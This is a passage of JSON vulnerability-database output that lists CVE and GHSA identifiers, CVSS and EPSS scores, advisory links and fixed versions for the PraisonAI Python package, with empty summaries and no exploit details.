ODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-14T13:25:07Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x783-xp3g-mqhp"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40315","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40315"},{"reference_url":"https://github.com/advisories/GHSA-x783-xp3g-mqhp","reference_id":"GHSA-x783-xp3g-mqhp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x783-xp3g-mqhp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188910?format=json","purl":"pkg:pypi/praisonai@4.5.133","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-xdc3-v772-zbf4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.133"}],"aliases":["CVE-2026-40315","GHSA-x783-xp3g-mqhp"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mker-659v-dfaa"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/331884?format=json","vulnerability_id":"VCID-mq2r-dw6g-77fx","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40154","reference_id":"","reference_type":"","scores":[{"value":"0.00053","scoring_system":"epss","scoring_elements":"0.17013","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40154"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-pv9q-275h-rh7x","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T17:08:52Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-pv9q-275h-rh7x"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40154","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40154"},{"reference_url":"https://github.com/advisories/GHSA-pv9q-275h-rh7x","reference_id":"GHSA-pv9q-275h-rh7x","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pv9q-275h-rh7x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188386?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-xdc3-v772-zbf4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40154","GHSA-pv9q-275h-rh7x"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mq2r-dw6g-77fx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/331879?format=json","vulnerability_id":"VCID-mwe3-4jct-jqhk","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40149","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03416","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40149"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"7.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"7.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4wr3-f4p3-5wjh","reference_id":"","reference_type":"","scores":[{"value":"7.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T15:28:35Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4wr3-f4p3-5wjh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40149","reference_id":"","reference_type":"","scores":[{"value":"7.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40149"},{"reference_url":"https://github.com/advisories/GHSA-4wr3-f4p3-5wjh","reference_id":"GHSA-4wr3-f4p3-5wjh","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4wr3-f4p3-5wjh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188386?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-xdc3-v772-zbf4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40149","GHSA-4wr3-f4p3-5wjh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mwe3-4jct-jqhk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330962?format=json","vulnerability_id":"VCID-qg8p-cewa-6khr","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39890","reference_id":"","reference_type":"","scores":[{"value":"0.00555","scoring_system":"epss","scoring_elements":"0.68406","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39890"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.115","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.115"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-32vr-5gcf-3pw2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-09T14:52:17Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-32vr-5gcf-3pw2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39890","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39890"},{"reference_url":"https://github.com/advisories/GHSA-32vr-5gcf-3pw2","reference_id":"GHSA-32vr-5gcf-3pw2","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-32vr-5gcf-3pw2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188753?format=json","purl":"pkg:pypi/praisonai@4.5.115","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-42xt-269j-m3hw"},{"vulnerability":"VCID-78hn-811u-1fgg"},{"vulnerability":"VCID-7fza-phhr-1ffb"},{"vulnerability":"VCID-9bnf-71rn-77e9"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-ceav-utcz-33fc"},{"vulnerability":"VCID-k8kd-r72v-d7hd"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-m23z-e1es-byhy"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-mq2r-dw6g-77fx"},{"vulnerability":"VCID-mwe3-4jct-jqhk"},{"vulnerability":"VCID-rymq-5dgd-t7g2"},{"vulnerability":"VCID-seay-h824-kug9"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-w65u-12gv-cud4"},{"vulnerability":"VCID-wuve-58em-sqas"},{"vulnerability":"VCID-xdc3-v772-zbf4"},{"vulnerability":"VCID-zmma-2kzw-7bc8"},{"vulnerability":"VCID-zwad-4gjg-e3e2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.115"}],"aliases":["CVE-2026-39890","GHSA-32vr-5gcf-3pw2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qg8p-cewa-6khr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/331866?format=json","vulnerability_id":"VCID-rymq-5dgd-t7g2","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40116","reference_id":"","reference_type":"","scores":[{"value":"0.00149","scoring_system":"epss","scoring_elements":"0.35132","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40116"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-q5r4-47m9-5mc7","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:42:36Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-q5r4-47m9-5mc7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40116","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40116"},{"reference_url":"https://github.com/advisories/GHSA-q5r4-47m9-5mc7","reference_id":"GHSA-q5r4-47m9-5mc7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q5r4-47m9-5mc7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188386?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-xdc3-v772-zbf4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40116","GHSA-q5r4-47m9-5mc7"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rymq-5dgd-t7g2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/331886?format=json","vulnerability_id":"VCID-seay-h824-kug9","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40156","reference_id":"","reference_type":"","scores":[{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.0836","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40156"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2g3w-cpc4-chr4","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-13T15:29:56Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2g3w-cpc4-chr4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40156","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40156"},{"reference_url":"https://github.com/advisories/GHSA-2g3w-cpc4-chr4","reference_id":"GHSA-2g3w-cpc4-chr4","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2g3w-cpc4-chr4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188386?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-xdc3-v772-zbf4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40156","GHSA-2g3w-cpc4-chr4"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-seay-h824-kug9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/331974?format=json","vulnerability_id":"VCID-uemf-6s9q-4kar","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40289","reference_id":"","reference_type":"","scores":[{"value":"0.00073","scoring_system":"epss","scoring_elements":"0.22328","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40289"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.139","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.139"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8x8f-54wf-vv92","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T20:18:27Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8x8f-54wf-vv92"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40289","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40289"},{"reference_url":"https://github.com/advisories/GHSA-8x8f-54wf-vv92","reference_id":"GHSA-8x8f-54wf-vv92","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8x8f-54wf-vv92"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188755?format=json","purl":"pkg:pypi/praisonai@4.5.139","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-t82b-kttm-ukbq"},{"vulnerability":"VCID-xdc3-v772-zbf4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.139"}],"aliases":["CVE-2026-40289","GHSA-8x8f-54wf-vv92"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uemf-6s9q-4kar"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/331862?format=json","vulnerability_id":"VCID-w65u-12gv-cud4","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40112","reference_id":"","reference_type":"","scores":[{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11634","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40112"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cfg2-mxfj-j6pw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:43:40Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cfg2-mxfj-j6pw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40112","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40112"},{"reference_url":"https://github.com/advisories/GHSA-cfg2-mxfj-j6pw","reference_id":"GHSA-cfg2-mxfj-j6pw","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cfg2-mxfj-j6pw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188386?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-xdc3-v772-zbf4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40112","GHSA-cfg2-mxfj-j6pw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w65u-12gv-cud4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/331865?format=json","vulnerability_id":"VCID-wuve-58em-sqas","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40115","reference_id":"","reference_type":"","scores":[{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22921","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40115"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2xgv-5cv2-47vv","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T15:28:36Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2xgv-5cv2-47vv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40115","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40115"},{"reference_url":"https://github.com/advisories/GHSA-2xgv-5cv2-47vv","reference_id":"GHSA-2xgv-5cv2-47vv","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2xgv-5cv2-47vv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188386?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-xdc3-v772-zbf4"}],"r